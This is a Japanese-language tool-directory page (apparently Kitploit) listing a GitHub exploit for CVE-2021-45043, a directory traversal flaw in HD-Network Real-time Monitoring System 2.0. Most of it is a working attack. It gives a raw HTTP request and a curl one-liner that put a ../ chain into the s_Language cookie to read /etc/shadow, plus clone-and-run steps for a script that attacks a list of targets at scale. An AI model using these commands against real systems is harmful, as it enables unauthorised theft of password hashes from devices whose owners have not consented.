Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-45043 — HD-Network Real-time Monitoring System 2.0では、/language/lang s_Languageパラメータを介して、../ ディレクトリトラバーサルにより/etc/shadowを読み取ることができます。 | Kitploit
ツール/GitHubGitHub/crypt0g30rgy/cve-2021-45043
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubcrypt0g30rgy/cve-2021-45043

cve-2021-45043

HD-Network Real-time Monitoring System 2.0では、/language/lang s_Languageパラメータを介して、../ ディレクトリトラバーサルにより/etc/shadowを読み取ることができます。

リポジトリを見る
1114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

cve-2021-45043

HD-Network Real-time Monitoring System 2.0 では、/language/lang の s_Language パラメータを介して、../ ディレクトリトラバーサルにより /etc/shadow を読み取ることができます。

初期投稿

https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f

Burp 経由での悪用

GET /language/lang HTTP/1.1 Host: IP.target Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow

ワンライナー経由での悪用

curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang

大量ターゲットの悪用

git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git

cd cve-2021-45043/

chmod +x script.sh

./script.sh targets.txt

ツールをダウンロード